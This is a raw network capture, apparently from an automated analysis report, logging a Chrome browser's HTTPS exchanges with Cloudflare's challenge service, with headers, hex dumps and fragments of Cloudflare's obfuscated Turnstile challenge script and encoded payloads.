                                                                                                                                                2024-10-28 16:49:19 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c6b17ae923aaf&lang=auto HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:20 UTC331INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:20 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 121418
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b243ee02c9f-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:20 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c
                                                                                                                                                Data Ascii: %20Feedback","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudfl
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 39 36 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 31 31 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 38 39 30 29 29 2f 38 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 30 30 29 29 2f 39 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 32 39 31 29 29 2f 31 30 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 31 36 37 39 29 29 2f 31 31 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 37 30 39 29 29 2f 31 32 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 31 34 32 34 39 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 33 30 31 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f
                                                                                                                                                Data Ascii: 96))/6)+-parseInt(gK(1411))/7+-parseInt(gK(890))/8*(-parseInt(gK(1500))/9)+parseInt(gK(291))/10*(parseInt(gK(1679))/11)+parseInt(gK(1709))/12,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,614249),eM=this||self,eN=eM[gL(301)],eO=functio
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 78 5b 68 6d 28 31 35 36 34 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 66 6c 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 6f 5b 68 6d 28 31 30 30 34 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 68 6d 28 38 32 36 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 6d 28 34 30 39 29 5d 3d 3d 3d 6f 5b 68 6d 28 31 35 38 33 29 5d 28 69 2c 44 29 3f 6f 5b 68 6d 28 31 36 37 32 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 6f 5b 68 6d 28 31 35 38 33 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 73 28 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 6e 29 7b 68 6e 3d 68 6d 2c 4f 62 6a 65 63 74 5b 68 6e 28 38 39 31 29 5d 5b 68 6e 28 31 32 31 30 29 5d 5b 68 6e 28 34 33 30 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29
                                                                                                                                                Data Ascii: x[hm(1564)];D=x[C],E=fl(g,h,D),B(E)?(F=o[hm(1004)]('s',E)&&!g[hm(826)](h[D]),o[hm(409)]===o[hm(1583)](i,D)?o[hm(1672)](s,i+D,E):F||s(o[hm(1583)](i,D),h[D])):s(i+D,E),C++);return j;function s(G,H,hn){hn=hm,Object[hn(891)][hn(1210)][hn(430)](j,H)||(j[H]=[])
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 69 53 4b 6e 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 74 52 68 63 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6e 4e 6f 43 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 42 59 5a 6d 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 73 53 62 56 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 5a 55 71 72 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 4e 65 6a 4c 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28
                                                                                                                                                Data Ascii: n(h,i){return h&i},'iSKnl':function(h,i){return h>i},'tRhcu':function(h,i){return h<i},'nNoCy':function(h,i){return h-i},'BYZmH':function(h,i){return h<<i},'sSbVt':function(h,i){return h&i},'ZUqrZ':function(h,i){return h|i},'NejLF':function(h,i){return h(
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 28 31 32 31 30 29 5d 5b 68 45 28 34 33 30 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 68 45 28 38 39 31 29 5d 5b 68 45 28 31 32 31 30 29 5d 5b 68 45 28 34 33 30 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 68 45 28 37 31 32 29 5d 28 32 35 36 2c 43 5b 68 45 28 31 30 35 36 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 68 45 28 36 30 39 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 45 28 31 31 33 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 45 28 31 30 35 36 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 68 45 28 31 32 38 33 29 5d 28 64 5b 68 45 28 37 30 37 29 5d 28 48 2c 31 29 2c 31 2e 33 26 4d 29 2c 64 5b 68 45 28
                                                                                                                                                Data Ascii: (1210)][hE(430)](x,L))C=L;else{if(Object[hE(891)][hE(1210)][hE(430)](B,C)){if(d[hE(712)](256,C[hE(1056)](0))){for(s=0;d[hE(609)](s,F);H<<=1,j-1==I?(I=0,G[hE(1138)](o(H)),H=0):I++,s++);for(M=C[hE(1056)](0),s=0;8>s;H=d[hE(1283)](d[hE(707)](H,1),1.3&M),d[hE(
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 7c 31 26 4d 2c 49 3d 3d 64 5b 68 45 28 31 33 38 35 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 68 45 28 31 31 33 38 29 5d 28 64 5b 68 45 28 32 34 34 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 30 3d 3d 44 26 26 46 2b 2b 7d 65 6c 73 65 20 47 3d 6a 5b 68 45 28 31 36 32 37 29 5d 28 43 29 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 45 28 31 32 38 33 29 5d 28 48 3c 3c 31 2c 64 5b 68 45 28 31 31 35 34 29 5d 28 4d 2c 31 29 29 2c 64 5b 68 45 28 36 36 34 29 5d 28 49 2c 64 5b 68 45 28 31 33 38 35 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 45 28 31 31 33 38 29 5d 28
                                                                                                                                                Data Ascii: ete B[C]}else for(M=x[C],s=0;s<F;H=H<<1|1&M,I==d[hE(1385)](j,1)?(I=0,G[hE(1138)](d[hE(244)](o,H)),H=0):I++,M>>=1,s++);D--,0==D&&F++}else G=j[hE(1627)](C)}for(M=2,s=0;s<F;H=d[hE(1283)](H<<1,d[hE(1154)](M,1)),d[hE(664)](I,d[hE(1385)](j,1))?(I=0,G[hE(1138)](
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 30 2c 4b 3d 4d 61 74 68 5b 68 48 28 31 31 37 36 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 48 28 34 38 31 29 5d 28 46 2c 4b 29 3b 4e 3d 64 5b 68 48 28 35 34 37 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 48 28 32 36 30 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 48 28 31 35 34 38 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 48 28 31 31 37 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 68 48 28 32 38 39 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a
                                                                                                                                                Data Ascii: 0,K=Math[hH(1176)](2,8),F=1;d[hH(481)](F,K);N=d[hH(547)](G,H),H>>=1,H==0&&(H=j,G=d[hH(260)](o,I++)),J|=(d[hH(1548)](0,N)?1:0)*F,F<<=1);s[B++]=e(J),O=B-1,x--;break;case 1:for(J=0,K=Math[hH(1176)](2,16),F=1;K!=F;N=G&H,H>>=1,d[hH(289)](0,H)&&(H=j,G=o(I++)),J
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 4b 28 37 35 30 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 4b 28 35 38 35 29 5d 5b 68 4b 28 31 32 32 32 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 4b 28 35 39 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 4b 28 35 38 35 29 5d 5b 68 4b 28 37 37 30 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 4b 28 35 38 35 29 5d 5b 68 4b 28 32 35 39 29 5d 2c 27 63 6f 64 65 27 3a 68 4b 28 31 32 35 38 29 2c 27 72 63 56 27 3a 65 4d 5b 68 4b 28 35 38 35 29 5d 5b 68 4b 28 31 33 38 39 29 5d 7d 2c 27 2a 27 29 7d 7d 2c 67 29 7d 2c 65 4d 5b 67 4c 28 33 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 4c 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d
                                                                                                                                                Data Ascii: 8)]({'source':e[hK(750)],'widgetId':eM[hK(585)][hK(1222)],'event':e[hK(592)],'cfChlOut':eM[hK(585)][hK(770)],'cfChlOutS':eM[hK(585)][hK(259)],'code':hK(1258),'rcV':eM[hK(585)][hK(1389)]},'*')}},g)},eM[gL(352)]=function(f,g,h,hL,i,j,k,l,m,n,o,s,x,B,C,D){i=
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 5d 3d 65 4d 5b 68 4c 28 35 38 35 29 5d 5b 68 4c 28 34 31 38 29 5d 2c 6e 5b 68 4c 28 31 34 36 38 29 5d 3d 65 4d 5b 68 4c 28 35 38 35 29 5d 5b 68 4c 28 31 34 36 38 29 5d 2c 6e 5b 68 4c 28 31 33 31 36 29 5d 3d 65 4d 5b 68 4c 28 35 38 35 29 5d 5b 68 4c 28 31 33 31 36 29 5d 2c 6e 5b 68 4c 28 39 33 33 29 5d 3d 65 4d 5b 68 4c 28 35 38 35 29 5d 5b 68 4c 28 31 31 39 34 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 68 4c 28 31 35 35 33 29 29 5d 28 29 2c 21 73 29 72 65 74 75 72 6e 3b 78 3d 68 4c 28 31 33 34 32 29 2c 73 5b 68 4c 28 31 31 30 37 29 5d 28 78 2c 6d 2c 21 21 5b 5d 29 2c 73 5b 68 4c 28 37 30 31 29 5d 3d 32 35 30 30 2c 73 5b 68 4c 28 31 33 30 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 73 5b 68 4c 28 31 32 32 39 29 5d 28 69 5b 68 4c 28 37 35 37
                                                                                                                                                Data Ascii: ]=eM[hL(585)][hL(418)],n[hL(1468)]=eM[hL(585)][hL(1468)],n[hL(1316)]=eM[hL(585)][hL(1316)],n[hL(933)]=eM[hL(585)][hL(1194)],o=n,s=new eM[(hL(1553))](),!s)return;x=hL(1342),s[hL(1107)](x,m,!![]),s[hL(701)]=2500,s[hL(1301)]=function(){},s[hL(1229)](i[hL(757


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                66192.168.2.1649801104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:20 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1575504935:1730132393:tsQBD6pnm-dRZ8ZlJHXvfJ9o3TZjLECqHOVZguSlcVA/8d9c6b17ae923aaf/phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 3063
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:20 UTC3063OUTData Raw: 76 5f 38 64 39 63 36 62 31 37 61 65 39 32 33 61 61 66 3d 54 57 79 37 39 37 62 37 61 37 6a 37 52 37 25 32 62 50 6b 74 50 6c 6b 6e 37 59 4e 58 34 45 44 6b 4f 6b 33 4a 37 74 49 37 6b 73 79 6b 71 37 6e 34 24 76 6b 32 37 24 4e 34 37 6c 44 6e 79 6b 44 37 43 57 44 24 64 6b 54 50 4c 6b 59 76 56 7a 37 43 54 49 52 66 45 37 6b 51 63 56 79 6b 2b 6b 58 49 51 56 6b 75 56 59 70 6b 73 37 24 44 6b 70 31 75 45 34 4d 6b 4f 37 6b 52 6b 7a 33 4a 69 77 7a 7a 4c 41 53 67 33 43 31 70 6a 4c 6b 31 56 38 76 68 48 51 6b 6c 4d 6b 45 34 73 76 48 66 4f 68 24 48 39 68 79 57 6b 67 2b 39 52 44 6b 6c 24 35 55 31 39 67 6b 43 63 4b 37 4c 31 45 48 67 35 7a 34 4c 4e 6b 6b 34 6b 74 6d 4c 6b 64 33 6b 6b 72 61 5a 45 49 58 37 6b 67 37 43 4d 38 31 79 73 6b 4f 38 54 6b 24 71 4f 72 24 70 6b 79 4d 43
                                                                                                                                                Data Ascii: v_8d9c6b17ae923aaf=TWy797b7a7j7R7%2bPktPlkn7YNX4EDkOk3J7tI7ksykq7n4$vk27$N47lDnykD7CWD$dkTPLkYvVz7CTIRfE7kQcVyk+kXIQVkuVYpks7$Dkp1uE4MkO7kRkz3JiwzzLASg3C1pjLk1V8vhHQklMkE4svHfOh$H9hyWkg+9RDkl$5U19gkCcK7L1EHg5z4LNkk4ktmLkd3kkraZEIX7kg7CM81yskO8Tk$qOr$pkyMC
                                                                                                                                                2024-10-28 16:49:20 UTC747INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:20 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 149816
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-gen: p73oJFj4REnRk+HzHX/wG9uQYCxTKeQArJs3fx3Mq8NgjPbArNrRyffj7PfgQaY9s/U9ZrX/IUBCxbNswQijvzwnB4ktV4b5SRPy9UCz+ipOwzYd8gXBUSjsAxtSAmG4UNVPjDGovd44CvcLRfGgtoPa3xCVQktp6X49P43jf1Z9ST1/lACw7PwmYthofc1YoAJbP3IDiYIESosXy2gf7A+2TDmuFCKLzhxer/z8oJnNhk1PqPvqE+zLRM6GqCGGpPVwgxEKOHBr3I7AI106G2XoISNlXAPL+5k1xh3C+YUT1u1sp9ZqABfGAjd6UlWzlwmK8mW4IvRxm3q+N5h3fJKo8ng/VWcvczdCtzVKt/lWkCstgoLsSr1kMtHOoRGA+FKf4GpADbMDTgthcN8dTxpN0/rHWSMMNqF56St8XrDZ+5sHsrnDwzvH1Aj4TrMJ/vlnHhb+ysY4fBpXtyS/j71MIfrNlpBkDupVRbTO2HzMahE=$SADzQkz3hRnIFniU
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b254c7b6b85-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:20 UTC622INData Raw: 72 61 32 51 65 6f 61 57 6a 33 71 42 69 37 65 6c 70 37 71 32 74 35 65 37 75 73 69 65 7a 34 75 76 71 4d 71 69 30 59 37 53 6c 59 2b 59 31 38 57 37 31 37 2f 66 7a 38 47 74 77 4f 47 76 72 39 32 67 78 39 79 6f 70 39 7a 6f 34 63 2f 75 37 61 33 30 37 4d 62 77 77 66 62 6d 30 72 50 2b 2b 74 72 57 2b 50 6d 38 76 67 54 46 77 63 63 4a 33 67 4c 56 43 2f 6a 34 30 52 4d 4c 37 4e 54 76 37 64 63 4b 30 42 6b 50 44 74 51 64 39 78 2f 79 49 66 54 34 37 2b 41 4a 35 77 55 70 2f 50 6e 2b 43 4f 38 62 38 75 72 39 4c 43 77 77 4b 68 48 78 4e 2f 6f 70 2b 54 76 2b 4b 2f 6f 62 4c 77 51 31 46 2f 6f 31 45 78 51 6a 49 6b 30 37 49 69 45 63 52 68 51 2f 4a 54 49 68 4d 7a 77 36 57 46 49 2f 47 56 42 5a 52 46 55 68 56 6b 64 46 56 6d 64 4c 4e 69 63 75 5a 53 5a 6f 61 30 5a 4c 64 57 70 57 54 47 5a
                                                                                                                                                Data Ascii: ra2QeoaWj3qBi7elp7q2t5e7usiez4uvqMqi0Y7SlY+Y18W717/fz8GtwOGvr92gx9yop9zo4c/u7a307Mbwwfbm0rP++trW+Pm8vgTFwccJ3gLVC/j40RML7NTv7dcK0BkPDtQd9x/yIfT47+AJ5wUp/Pn+CO8b8ur9LCwwKhHxN/op+Tv+K/obLwQ1F/o1ExQjIk07IiEcRhQ/JTIhMzw6WFI/GVBZRFUhVkdFVmdLNicuZSZoa0ZLdWpWTGZ
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 39 73 59 47 64 52 54 6e 35 70 61 58 47 4d 69 32 4e 78 54 70 70 35 58 32 43 50 64 6e 39 57 66 48 57 6e 64 5a 64 33 70 5a 78 73 65 33 6d 75 66 58 31 77 5a 70 52 7a 72 49 35 79 74 72 65 75 66 49 71 49 66 36 4b 30 6e 4c 78 39 68 59 4b 68 78 4c 2f 4b 69 4d 36 68 74 39 43 36 6e 4e 43 38 77 4d 44 43 30 36 32 6b 6a 62 75 32 33 4c 33 66 72 4c 43 61 33 37 43 76 6d 62 43 66 35 74 2f 49 79 73 50 6b 33 4f 32 77 33 39 2f 67 34 2b 76 5a 38 50 58 4d 30 2b 58 37 74 39 50 58 42 4f 2f 6b 35 51 50 62 76 39 4c 5a 34 76 73 44 35 65 51 53 43 77 54 63 46 63 30 46 46 4f 4c 54 37 74 6e 7a 37 65 73 66 48 4f 73 45 45 76 55 66 2b 67 4d 46 2b 66 4d 63 2f 53 63 4c 47 77 2f 73 4b 78 37 74 4e 43 45 50 46 50 51 55 37 54 6f 2b 4d 76 73 2f 51 67 41 55 50 30 56 45 4d 54 34 42 4f 68 34 4c 54
                                                                                                                                                Data Ascii: 9sYGdRTn5paXGMi2NxTpp5X2CPdn9WfHWndZd3pZxse3mufX1wZpRzrI5ytreufIqIf6K0nLx9hYKhxL/KiM6ht9C6nNC8wMDC062kjbu23L3frLCa37CvmbCf5t/IysPk3O2w39/g4+vZ8PXM0+X7t9PXBO/k5QPbv9LZ4vsD5eQSCwTcFc0FFOLT7tnz7esfHOsEEvUf+gMF+fMc/ScLGw/sKx7tNCEPFPQU7To+Mvs/QgAUP0VEMT4BOh4LT
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 4e 5a 47 47 4d 61 59 75 4f 5a 5a 70 63 58 35 64 76 6d 59 4f 4d 58 32 39 66 59 6f 70 69 66 59 74 33 66 58 36 78 62 6d 70 2f 69 36 4f 46 72 6f 36 52 6d 62 65 57 6c 49 71 51 65 71 72 41 6f 62 36 56 76 70 57 33 6c 71 48 4d 69 4c 61 4d 6a 5a 69 4d 73 4c 76 4b 72 36 44 4f 79 74 65 5a 6f 35 4b 38 31 74 54 53 34 4c 47 63 72 73 58 6c 6e 39 4c 6e 35 36 71 69 7a 64 62 4b 34 76 47 72 7a 65 66 4b 7a 39 66 4f 74 65 66 63 2b 50 33 66 37 4c 2f 35 30 62 2f 2b 32 50 66 46 77 2f 7a 65 32 67 6a 32 41 38 7a 65 44 76 48 71 30 64 41 57 44 76 66 6a 39 64 4c 63 39 51 30 54 36 74 6b 45 31 65 77 6b 4b 41 67 59 4b 79 51 56 42 2f 6b 74 36 41 55 4e 37 41 63 48 4b 69 34 6b 43 53 63 4f 50 51 63 64 50 52 45 53 50 53 52 41 4d 69 55 61 45 55 51 4a 43 41 70 4d 49 68 6f 6d 44 53 59 2f 43 6c
                                                                                                                                                Data Ascii: NZGGMaYuOZZpcX5dvmYOMX29fYopifYt3fX6xbmp/i6OFro6RmbeWlIqQeqrAob6VvpW3lqHMiLaMjZiMsLvKr6DOyteZo5K81tTS4LGcrsXln9Ln56qizdbK4vGrzefKz9fOtefc+P3f7L/50b/+2PfFw/ze2gj2A8zeDvHq0dAWDvfj9dLc9Q0T6tkE1ewkKAgYKyQVB/kt6AUN7AcHKi4kCScOPQcdPRESPSRAMiUaEUQJCApMIhomDSY/Cl
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 63 47 56 63 6b 48 42 5a 6b 61 47 65 6d 32 4b 61 6f 5a 53 46 70 58 65 64 71 33 79 78 6b 49 64 74 6e 5a 52 30 63 6e 57 32 65 5a 4f 4f 6a 37 64 35 69 4a 47 51 6b 62 43 63 78 5a 53 65 6e 4d 53 66 69 35 79 33 77 49 6d 5a 78 74 48 54 76 73 36 34 7a 71 2f 47 6c 61 2b 50 6e 4d 43 71 72 4d 48 55 35 65 4f 7a 70 62 6a 42 71 74 37 48 70 61 72 72 7a 72 79 70 71 64 4b 73 73 76 66 56 7a 4c 48 53 31 71 2b 35 2f 72 72 54 38 74 33 32 42 50 4c 6b 76 38 4c 59 39 75 33 75 77 41 54 75 41 51 66 52 39 4f 38 4d 30 77 50 30 2b 2b 59 51 43 67 72 39 41 51 48 2b 2b 4f 41 68 42 53 4d 55 35 53 72 70 4a 53 62 35 44 67 62 38 48 42 37 7a 42 4f 30 55 4b 50 55 56 48 42 34 51 4e 43 34 58 50 52 52 45 4e 52 59 52 46 7a 38 66 4a 45 6f 32 48 45 4d 4d 51 43 41 52 4a 45 42 4a 55 55 45 35 4b 6b 73
                                                                                                                                                Data Ascii: cGVckHBZkaGem2KaoZSFpXedq3yxkIdtnZR0cnW2eZOOj7d5iJGQkbCcxZSenMSfi5y3wImZxtHTvs64zq/Gla+PnMCqrMHU5eOzpbjBqt7HparrzrypqdKssvfVzLHS1q+5/rrT8t32BPLkv8LY9u3uwATuAQfR9O8M0wP0++YQCgr9AQH++OAhBSMU5SrpJSb5Dgb8HB7zBO0UKPUVHB4QNC4XPRRENRYRFz8fJEo2HEMMQCARJEBJUUE5Kks
